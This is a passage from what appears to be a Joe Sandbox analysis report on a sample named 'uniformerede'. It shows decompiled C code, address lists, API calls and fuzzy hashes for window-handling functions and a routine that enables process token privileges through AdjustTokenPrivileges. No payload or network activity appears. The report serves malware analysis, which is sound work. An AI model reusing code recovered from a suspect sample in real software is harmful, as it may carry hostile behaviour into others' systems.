                                                                                                                                                                                                                            • API ID: RestoreSave$B080NtdllProc_Window
                                                                                                                                                                                                                            • String ID: LbC
                                                                                                                                                                                                                            • API String ID: 4024241980-1054848185
                                                                                                                                                                                                                            • Opcode ID: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                                                                                                                                                                                            • Instruction ID: 9827756e5d0f78ec9e29d95b15367e488dbc04d0ac3e4e0047c09454960c1bc5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AE19D34A04605DFEB10DF6AC8819AEF3F5FF58304B2485AAE805A7361D738ED41CB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00441A14 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                            			E00441A14(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E0043A5D0(_t43);
			}










                                                                                                                                                                                                                            0x00441a17
                                                                                                                                                                                                                            0x00441a1a
                                                                                                                                                                                                                            0x00441a2a
                                                                                                                                                                                                                            0x00441a59
                                                                                                                                                                                                                            0x00441a2c
                                                                                                                                                                                                                            0x00441a2c
                                                                                                                                                                                                                            0x00441a40
                                                                                                                                                                                                                            0x00441a4b
                                                                                                                                                                                                                            0x00441a4c
                                                                                                                                                                                                                            0x00441a4d
                                                                                                                                                                                                                            0x00441a4e
                                                                                                                                                                                                                            0x00441a4e
                                                                                                                                                                                                                            0x00441a71
                                                                                                                                                                                                                            0x00441a81
                                                                                                                                                                                                                            0x00441a85
                                                                                                                                                                                                                            0x00441a89
                                                                                                                                                                                                                            0x00441a94
                                                                                                                                                                                                                            0x00441a94
                                                                                                                                                                                                                            0x00441a85
                                                                                                                                                                                                                            0x00441a9c
                                                                                                                                                                                                                            0x00441aa3
                                                                                                                                                                                                                            0x00441aad
                                                                                                                                                                                                                            0x00441ab8
                                                                                                                                                                                                                            0x00441ac8

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                                                                                                                            • String ID: ,
                                                                                                                                                                                                                            • API String ID: 2266315723-3772416878
                                                                                                                                                                                                                            • Opcode ID: facb28e0aef8c1a81de05685d9e83ea55f3ccb07f5ee46e9bac503663b8db04d
                                                                                                                                                                                                                            • Instruction ID: 7764449da7fe852df51dbb9cb86ecf5b737bbd4cbd6d31589173a55badb93002
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: facb28e0aef8c1a81de05685d9e83ea55f3ccb07f5ee46e9bac503663b8db04d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89118171908200ABDB01DE6DC885A9B77D8AF49354F04453EFD58EB291D739E9008BA6
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00453DA4 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 284windowCOMMONCrypto
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                            			E00453DA4(intOrPtr __eax, struct HWND__** __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				struct HWND__* _v24;
				void* __ebp;
				struct HWND__* _t92;
				intOrPtr _t112;
				intOrPtr _t115;
				struct HWND__* _t121;
				struct HWND__* _t124;
				intOrPtr _t128;
				struct HWND__* _t129;
				intOrPtr _t130;
				intOrPtr _t131;
				struct HWND__* _t133;
				struct HWND__* _t136;
				intOrPtr _t142;
				intOrPtr _t172;
				struct HDC__* _t177;
				struct HWND__** _t200;
				struct HWND__* _t218;
				struct HWND__* _t219;
				intOrPtr _t228;
				void* _t230;
				void* _t231;
				intOrPtr _t237;
				intOrPtr _t245;
				struct HWND__* _t249;
				struct HWND__* _t250;
				struct HWND__* _t255;
				struct HWND__* _t256;
				void* _t258;
				void* _t260;
				intOrPtr _t261;
				void* _t263;
				void* _t267;

				_t258 = _t260;
				_t261 = _t260 + 0xffffffec;
				_t200 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t218 = _t92;
				_t263 = _t218 - 0x46;
				if(_t263 > 0) {
					_t219 = _t218 - 0xb01a;
					__eflags = _t219;
					if(_t219 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E00403DE8(_v8, __eflags);
						}
					} else {
						__eflags = _t219 == 1;
						if(_t219 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E00403DE8(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t263 == 0) {
						_t112 = _v8;
						_t228 =  *0x4541d8; // 0x1
						__eflags = _t228 - ( *(_t112 + 0x1c) &  *0x4541d4);
						if(_t228 == ( *(_t112 + 0x1c) &  *0x4541d4)) {
							_t115 = _v8;
							__eflags =  *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff < 0) {
								_t128 = _v8;
								__eflags =  *((char*)(_t128 + 0x22b)) - 2;
								if( *((char*)(_t128 + 0x22b)) != 2) {
									_t129 = __edx[2];
									_t26 = _t129 + 0x18;
									 *_t26 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t121 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t121;
							if(_t121 == 0) {
								L30:
								_t124 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t124;
								if(_t124 == 0) {
									L32:
									 *( *((intOrPtr*)(_t200 + 8)) + 0x18) =  *( *((intOrPtr*)(_t200 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t124 == 3;
									if(_t124 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t121 == 2;
								if(_t121 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t230 = _t218 + 0xfffffffa - 3;
						if(_t230 < 0) {
							__eflags =  *0x49be6c;
							if( *0x49be6c != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t130 = _v8;
									__eflags =  *(_t130 + 0x1c) & 0x00000010;
									if(( *(_t130 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t255 = 0;
										_t131 = _v8;
										__eflags =  *((char*)(_t131 + 0x22f)) - 2;
										if( *((char*)(_t131 + 0x22f)) != 2) {
											_t133 =  *(_v8 + 0x220);
											__eflags = _t133;
											if(_t133 != 0) {
												__eflags = _t133 - _v8;
												if(_t133 != _v8) {
													_t255 = E00441704(_t133);
												}
											}
										} else {
											_t136 = E004546D0(_v8);
											__eflags = _t136;
											if(_t136 != 0) {
												_t255 = E00441704(E004546D0(_v8));
											}
										}
										__eflags = _t255;
										if(_t255 == 0) {
											goto L43;
										} else {
											_t92 = SetFocus(_t255);
										}
									}
								}
							}
							goto L44;
						} else {
							_t231 = _t230 - 0x22;
							if(_t231 == 0) {
								_v24 = __edx[2];
								__eflags = _v24->i - 1;
								if(_v24->i != 1) {
									goto L43;
								} else {
									_t142 = _v8;
									__eflags =  *(_t142 + 0x248);
									if( *(_t142 + 0x248) == 0) {
										goto L43;
									} else {
										_t249 = E0044DD30( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t249;
										if(_t249 == 0) {
											goto L43;
										} else {
											_v16 = E0042572C(0, 1);
											_push(_t258);
											_push(0x45401d);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t258);
											_push(0x454000);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											E00425CE8(_v16,  *(_v24 + 0x18));
											E00425B88(_v16);
											E0044F218(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t237);
											 *[fs:eax] = _t237;
											_push(0x454007);
											__eflags = 0;
											E00425CE8(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t231 == 1) {
									_t256 = __edx[2];
									__eflags = _t256->i - 1;
									if(_t256->i != 1) {
										goto L43;
									} else {
										_t172 = _v8;
										__eflags =  *(_t172 + 0x248);
										if( *(_t172 + 0x248) == 0) {
											goto L43;
										} else {
											_t250 = E0044DD30( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
											__eflags = _t250;
											if(_t250 == 0) {
												goto L43;
											} else {
												_t177 = E00441704(_v8);
												L00407730();
												_v20 = _t177;
												 *[fs:eax] = _t261;
												_v16 = E0042572C(0, 1);
												 *[fs:eax] = _t261;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t261;
												E00425CE8(_v16, _v20);
												E00425B88(_v16);
												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x454107, _t258,  *[fs:eax], 0x454124, _t258,  *[fs:eax], 0x45414b, _t258, _t177);
												_pop(_t245);
												 *[fs:eax] = _t245;
												_push(0x45410e);
												__eflags = 0;
												E00425CE8(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t267 = _t92 -  *0x49ebc4; // 0xc089
									if(_t267 == 0) {
										E0043C130(_v8, 0, 0xb025, 0);
										E0043C130(_v8, 0, 0xb024, 0);
										E0043C130(_v8, 0, 0xb035, 0);
										E0043C130(_v8, 0, 0xb009, 0);
										E0043C130(_v8, 0, 0xb008, 0);
										E0043C130(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t92 = E0043F118(_v8, _t200);
									L44:
									return _t92;
								}
							}
						}
					}
				}
			}








































                                                                                                                                                                                                                            0x00453da5
                                                                                                                                                                                                                            0x00453da7
                                                                                                                                                                                                                            0x00453dad
                                                                                                                                                                                                                            0x00453daf
                                                                                                                                                                                                                            0x00453db2
                                                                                                                                                                                                                            0x00453db4
                                                                                                                                                                                                                            0x00453db6
                                                                                                                                                                                                                            0x00453db9
                                                                                                                                                                                                                            0x00453dde
                                                                                                                                                                                                                            0x00453dde
                                                                                                                                                                                                                            0x00453de4
                                                                                                                                                                                                                            0x00453e90
                                                                                                                                                                                                                            0x00453e97
                                                                                                                                                                                                                            0x00453ea4
                                                                                                                                                                                                                            0x00453ea4
                                                                                                                                                                                                                            0x00453dea
                                                                                                                                                                                                                            0x00453dea
                                                                                                                                                                                                                            0x00453deb
                                                                                                                                                                                                                            0x00453e6f
                                                                                                                                                                                                                            0x00453e76
                                                                                                                                                                                                                            0x00453e83
                                                                                                                                                                                                                            0x00453e83
                                                                                                                                                                                                                            0x00453ded
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453ded
                                                                                                                                                                                                                            0x00453deb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453dbb
                                                                                                                                                                                                                            0x00453dbb
                                                                                                                                                                                                                            0x00453eae
                                                                                                                                                                                                                            0x00453ebc
                                                                                                                                                                                                                            0x00453ec3
                                                                                                                                                                                                                            0x00453ec6
                                                                                                                                                                                                                            0x00453ecc
                                                                                                                                                                                                                            0x00453ed6
                                                                                                                                                                                                                            0x00453ed8
                                                                                                                                                                                                                            0x00453eda
                                                                                                                                                                                                                            0x00453edd
                                                                                                                                                                                                                            0x00453ee4
                                                                                                                                                                                                                            0x00453ee6
                                                                                                                                                                                                                            0x00453ee9
                                                                                                                                                                                                                            0x00453ee9
                                                                                                                                                                                                                            0x00453ee9
                                                                                                                                                                                                                            0x00453ee9
                                                                                                                                                                                                                            0x00453ee4
                                                                                                                                                                                                                            0x00453ef6
                                                                                                                                                                                                                            0x00453ef6
                                                                                                                                                                                                                            0x00453ef8
                                                                                                                                                                                                                            0x00453f02
                                                                                                                                                                                                                            0x00453f0b
                                                                                                                                                                                                                            0x00453f0b
                                                                                                                                                                                                                            0x00453f0d
                                                                                                                                                                                                                            0x00453f17
                                                                                                                                                                                                                            0x00453f1a
                                                                                                                                                                                                                            0x00453f0f
                                                                                                                                                                                                                            0x00453f0f
                                                                                                                                                                                                                            0x00453f11
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453f11
                                                                                                                                                                                                                            0x00453efa
                                                                                                                                                                                                                            0x00453efa
                                                                                                                                                                                                                            0x00453efc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453efc
                                                                                                                                                                                                                            0x00453ef8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453dc1
                                                                                                                                                                                                                            0x00453dc4
                                                                                                                                                                                                                            0x00453dc7
                                                                                                                                                                                                                            0x00453df2
                                                                                                                                                                                                                            0x00453df9
                                                                                                                                                                                                                            0x00453dff
                                                                                                                                                                                                                            0x00453e02
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453e08
                                                                                                                                                                                                                            0x00453e08
                                                                                                                                                                                                                            0x00453e0b
                                                                                                                                                                                                                            0x00453e0f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453e15
                                                                                                                                                                                                                            0x00453e15
                                                                                                                                                                                                                            0x00453e17
                                                                                                                                                                                                                            0x00453e1a
                                                                                                                                                                                                                            0x00453e21
                                                                                                                                                                                                                            0x00453e43
                                                                                                                                                                                                                            0x00453e49
                                                                                                                                                                                                                            0x00453e4b
                                                                                                                                                                                                                            0x00453e4d
                                                                                                                                                                                                                            0x00453e50
                                                                                                                                                                                                                            0x00453e57
                                                                                                                                                                                                                            0x00453e57
                                                                                                                                                                                                                            0x00453e50
                                                                                                                                                                                                                            0x00453e23
                                                                                                                                                                                                                            0x00453e26
                                                                                                                                                                                                                            0x00453e2b
                                                                                                                                                                                                                            0x00453e2d
                                                                                                                                                                                                                            0x00453e3c
                                                                                                                                                                                                                            0x00453e3c
                                                                                                                                                                                                                            0x00453e2d
                                                                                                                                                                                                                            0x00453e59
                                                                                                                                                                                                                            0x00453e5b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453e61
                                                                                                                                                                                                                            0x00453e62
                                                                                                                                                                                                                            0x00453e62
                                                                                                                                                                                                                            0x00453e5b
                                                                                                                                                                                                                            0x00453e0f
                                                                                                                                                                                                                            0x00453e02
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453dc9
                                                                                                                                                                                                                            0x00453dc9
                                                                                                                                                                                                                            0x00453dcc
                                                                                                                                                                                                                            0x00453f26
                                                                                                                                                                                                                            0x00453f2c
                                                                                                                                                                                                                            0x00453f2f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453f35
                                                                                                                                                                                                                            0x00453f35
                                                                                                                                                                                                                            0x00453f38
                                                                                                                                                                                                                            0x00453f3f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453f45
                                                                                                                                                                                                                            0x00453f5b
                                                                                                                                                                                                                            0x00453f5d
                                                                                                                                                                                                                            0x00453f5f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00453f65
                                                                                                                                                                                                                            0x00453f71
                                                                                                                                                                                                                            0x00453f76
                                                                                                                                                                                                                            0x00453f77
                                                                                                                                                                                                                            0x00453f7c
                                                                                                                                                                                                                            0x00453f7f
                                                                                                                                                                                                                            0x00453f8e
                                                                                                                                                                                                                            0x00453f93
                                                                                                                                                                                                                            0x00453f94
                                                                                                                                                                                                                            0x00453f99
                                                                                                                                                                                                                            0x00453f9c
                                                                                                                                                                                                                            0x00453fa8
                                                                                                                                                                                                                            0x00453fbb
                                                                                                                                                                                                                            0x00453fd3
                                                                                                                                                                                                                            0x00453fda
                                                                                                                                                                                                                            0x00453fdd
                                                                                                                                                                                                                            0x00453fe0
                                                                                                                                                                                                                            0x00453fe5
                                                                                                                                                                                                                            0x00453fea
                                                                                                                                                                                                                            0x00453fff
                                                                                                                                                                                                                            0x00453fff
                                                                                                                                                                                                                            0x00453f5f
                                                                                                                                                                                                                            0x00453f3f
                                                                                                                                                                                                                            0x00453dd2
                                                                                                                                                                                                                            0x00453dd3
                                                                                                                                                                                                                            0x00454024
                                                                                                                                                                                                                            0x00454027
                                                                                                                                                                                                                            0x0045402a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00454030
                                                                                                                                                                                                                            0x00454030
                                                                                                                                                                                                                            0x00454033
                                                                                                                                                                                                                            0x0045403a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00454040
                                                                                                                                                                                                                            0x00454053
                                                                                                                                                                                                                            0x00454055
                                                                                                                                                                                                                            0x00454057
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045405d
                                                                                                                                                                                                                            0x00454060
                                                                                                                                                                                                                            0x00454066
                                                                                                                                                                                                                            0x0045406b
                                                                                                                                                                                                                            0x00454079
                                                                                                                                                                                                                            0x00454088
                                                                                                                                                                                                                            0x00454096
                                                                                                                                                                                                                            0x004540a2
                                                                                                                                                                                                                            0x004540b0
                                                                                                                                                                                                                            0x004540b9
                                                                                                                                                                                                                            0x004540cc
                                                                                                                                                                                                                            0x004540df
                                                                                                                                                                                                                            0x004540e4
                                                                                                                                                                                                                            0x004540e7
                                                                                                                                                                                                                            0x004540ea
                                                                                                                                                                                                                            0x004540ef
                                                                                                                                                                                                                            0x004540f4
                                                                                                                                                                                                                            0x00454106
                                                                                                                                                                                                                            0x00454106
                                                                                                                                                                                                                            0x00454057
                                                                                                                                                                                                                            0x0045403a
                                                                                                                                                                                                                            0x00453dd9
                                                                                                                                                                                                                            0x00454152
                                                                                                                                                                                                                            0x00454152
                                                                                                                                                                                                                            0x00454158
                                                                                                                                                                                                                            0x00454166
                                                                                                                                                                                                                            0x00454177
                                                                                                                                                                                                                            0x00454188
                                                                                                                                                                                                                            0x00454199
                                                                                                                                                                                                                            0x004541aa
                                                                                                                                                                                                                            0x004541bb
                                                                                                                                                                                                                            0x004541bb
                                                                                                                                                                                                                            0x004541c0
                                                                                                                                                                                                                            0x004541c5
                                                                                                                                                                                                                            0x004541ca
                                                                                                                                                                                                                            0x004541d0
                                                                                                                                                                                                                            0x004541d0
                                                                                                                                                                                                                            0x00453dd3
                                                                                                                                                                                                                            0x00453dcc
                                                                                                                                                                                                                            0x00453dc7
                                                                                                                                                                                                                            0x00453dbb

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: RestoreSave$B080Focus
                                                                                                                                                                                                                            • String ID: LbC
                                                                                                                                                                                                                            • API String ID: 809140284-1054848185
                                                                                                                                                                                                                            • Opcode ID: 9ec593775dbac7e468da3440c33bd0948fb5aeb1ddc2f22738828f1b73fdd268
                                                                                                                                                                                                                            • Instruction ID: b33e20edd2ce9fca5c714fd75ef70db920f5be85b1e855ee555859ce0c1c913c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ec593775dbac7e468da3440c33bd0948fb5aeb1ddc2f22738828f1b73fdd268
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56B1D730A00504DFCB10DFA9D889AAFB7F5EB58305F5545A6F800AB352C738AE85DF58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00475958 Relevance: 10.6, APIs: 7, Instructions: 105COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 61%
                                                                                                                                                                                                                            			E00475958(char __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v9;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v36;
				struct _TOKEN_PRIVILEGES _v52;
				char _v56;
				intOrPtr* _t30;
				intOrPtr _t71;
				intOrPtr _t74;
				void* _t80;
				void* _t81;
				intOrPtr _t82;
				void* _t86;

				_t80 = _t81;
				_t82 = _t81 + 0xffffffcc;
				_v56 = 0;
				_v9 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t80);
				_push(0x475a82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				_t30 =  *0x49de34; // 0x49b0ec
				if( *_t30 != 2) {
					L11:
					_pop(_t71);
					 *[fs:eax] = _t71;
					_push(0x475a89);
					E004049C0( &_v56);
					return E004049C0( &_v8);
				} else {
					if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) == 0) {
						if((0 | GetLastError() == 0x00000000) == 0) {
							E0040C918(GetLastError(),  &_v56);
							E0040D144(_v56, 1);
							E00404378();
						}
						goto L11;
					} else {
						_push(_t80);
						_push(0x475a2e);
						_push( *[fs:eax]);
						 *[fs:eax] = _t82;
						if(LookupPrivilegeValueA(0, E00404E80(_v8),  &(_v36.Privileges)) != 0) {
							_v36.PrivilegeCount = 1;
							_t86 = _v9 - 1;
							if(_t86 < 0) {
								_v24 = 0;
							} else {
								if(_t86 == 0) {
									_v24 = 2;
								}
							}
							_v20 = 0;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							AdjustTokenPrivileges(_v16, 0,  &_v36, 0x10,  &_v52,  &_v20);
						}
						_pop(_t74);
						 *[fs:eax] = _t74;
						_push(0x475a35);
						return CloseHandle(_v16);
					}
				}
			}


















                                                                                                                                                                                                                            0x00475959
                                                                                                                                                                                                                            0x0047595b
                                                                                                                                                                                                                            0x00475963
                                                                                                                                                                                                                            0x00475966
                                                                                                                                                                                                                            0x00475969
                                                                                                                                                                                                                            0x0047596f
                                                                                                                                                                                                                            0x00475976
                                                                                                                                                                                                                            0x00475977
                                                                                                                                                                                                                            0x0047597c
                                                                                                                                                                                                                            0x0047597f
                                                                                                                                                                                                                            0x00475984
                                                                                                                                                                                                                            0x0047598c
                                                                                                                                                                                                                            0x00475a64
                                                                                                                                                                                                                            0x00475a66
                                                                                                                                                                                                                            0x00475a69
                                                                                                                                                                                                                            0x00475a6c
                                                                                                                                                                                                                            0x00475a74
                                                                                                                                                                                                                            0x00475a81
                                                                                                                                                                                                                            0x00475992
                                                                                                                                                                                                                            0x004759a5
                                                                                                                                                                                                                            0x00475a41
                                                                                                                                                                                                                            0x00475a4b
                                                                                                                                                                                                                            0x00475a5a
                                                                                                                                                                                                                            0x00475a5f
                                                                                                                                                                                                                            0x00475a5f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004759ab
                                                                                                                                                                                                                            0x004759ad
                                                                                                                                                                                                                            0x004759ae
                                                                                                                                                                                                                            0x004759b3
                                                                                                                                                                                                                            0x004759b6
                                                                                                                                                                                                                            0x004759cf
                                                                                                                                                                                                                            0x004759d1
                                                                                                                                                                                                                            0x004759db
                                                                                                                                                                                                                            0x004759dd
                                                                                                                                                                                                                            0x004759ec
                                                                                                                                                                                                                            0x004759df
                                                                                                                                                                                                                            0x004759df
                                                                                                                                                                                                                            0x004759e1
                                                                                                                                                                                                                            0x004759e1
                                                                                                                                                                                                                            0x004759df
                                                                                                                                                                                                                            0x004759f1
                                                                                                                                                                                                                            0x004759fa
                                                                                                                                                                                                                            0x004759fb
                                                                                                                                                                                                                            0x004759fc
                                                                                                                                                                                                                            0x004759fd
                                                                                                                                                                                                                            0x00475a12
                                                                                                                                                                                                                            0x00475a12
                                                                                                                                                                                                                            0x00475a19
                                                                                                                                                                                                                            0x00475a1c
                                                                                                                                                                                                                            0x00475a1f
                                                                                                                                                                                                                            0x00475a2d
                                                                                                                                                                                                                            0x00475a2d
                                                                                                                                                                                                                            0x004759a5

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000000,00475A82), ref: 00475998
                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,00475A82), ref: 0047599E
                                                                                                                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 004759C8
                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,?,?,00000000,00475A2E,?,00000000,00000028,?,00000000,00475A82), ref: 00475A12
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00475A35,00000000,00000028,?,00000000,00475A82), ref: 00475A28
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000028,?,00000000,00475A82), ref: 00475A35
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000028,?,00000000,00475A82), ref: 00475A43
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLastProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1944759421-0
                                                                                                                                                                                                                            • Opcode ID: 5d0e082824e478a09f318278083c587987d0817199167bde93ddb0bc5826edd3
                                                                                                                                                                                                                            • Instruction ID: 3c61c7cdd0eda20fe66ef621c1da0ff4ff2913ef0bcb8c05ec3cca93a53440b9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d0e082824e478a09f318278083c587987d0817199167bde93ddb0bc5826edd3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2931B2B1904608AEDB01EBA5DD42AEF77BDEF45304F51453AF904FB280DBB86E048668
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045A104 Relevance: 9.1, APIs: 6, Instructions: 86windownativeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                            			E0045A104(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
